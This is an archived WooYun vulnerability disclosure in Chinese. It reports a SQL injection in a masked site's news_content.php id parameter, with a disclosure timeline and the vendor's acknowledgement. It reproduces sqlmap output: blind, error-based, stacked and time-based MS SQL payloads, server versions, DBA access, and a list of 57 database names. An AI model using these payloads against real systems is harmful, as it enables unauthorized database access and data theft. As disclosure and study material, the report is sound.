乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经确认,细节仅向厂商公开 2016-01-02: 细节向核心白帽子及相关领域专家公开 2016-01-12: 细节向普通白帽子公开 2016-01-22: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
注入点:http://**.**.**.**/news_content.php?id=180
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=180' AND 6668=6668 AND 'QXCs'='QXCs Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=180' AND 2192=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2192=2192) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113))) AND 'qGqd'='qGqd Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=180';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: id=180' WAITFOR DELAY '0:0:5'-----web server operating system: FreeBSD 7.1 or 6.4web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Microsoft SQL Server 2008
DBA/数据库:
current database: 'globalweb'current user is DBA: Trueavailable databases [57]:[*] CRMAttachDB[*] CRMCIPDB[*] DBAssistant[*] DEMO[*] DSC_CHT[*] DSC_ENG[*] DSC_MALA[*] DSC_VIET[*] DSCLeader[*] DSCRPT[*] DSCSYS[*] DSCSYSBK[*] DSCSYSOLD[*] EDW[*] EFNETDB[*] EFNETDBPDLOG[*] EFNETSYS[*] Europe[*] globalweb[*] globalweb_test[*] JOYTECH[*] KUNSHAN[*] Leader[*] master[*] mdmDB[*] model[*] msdb[*] PA[*] PANTEC[*] portal[*] ReportServer[*] ReportServerTempDB[*] SFT_Europe[*] SFT_JOYTECH[*] SFT_KUNSHAN[*] SFT_SHENMOT[*] SFT_SHENZHEN[*] SFT_TEST1[*] SFT_TESTSHENZHEN[*] SFTSYS[*] SHENMOT[*] SHENZHEN[*] tempdb[*] TEST1[*] TESTSHENZHEN[*] US[*] V-POINT_AUD[*] V-POINT_RPS[*] WINDCHILL[*] YJOYNOVA[*] YNOVA[*] YPRIMA[*] YSINGA[*] YTOY[*] ZKUNSHAN[*] ZSHENMOT[*] ZSHENZHEN
危害等级:高
漏洞Rank:16
确认时间:2015-12-23 04:01
感謝通報
暂无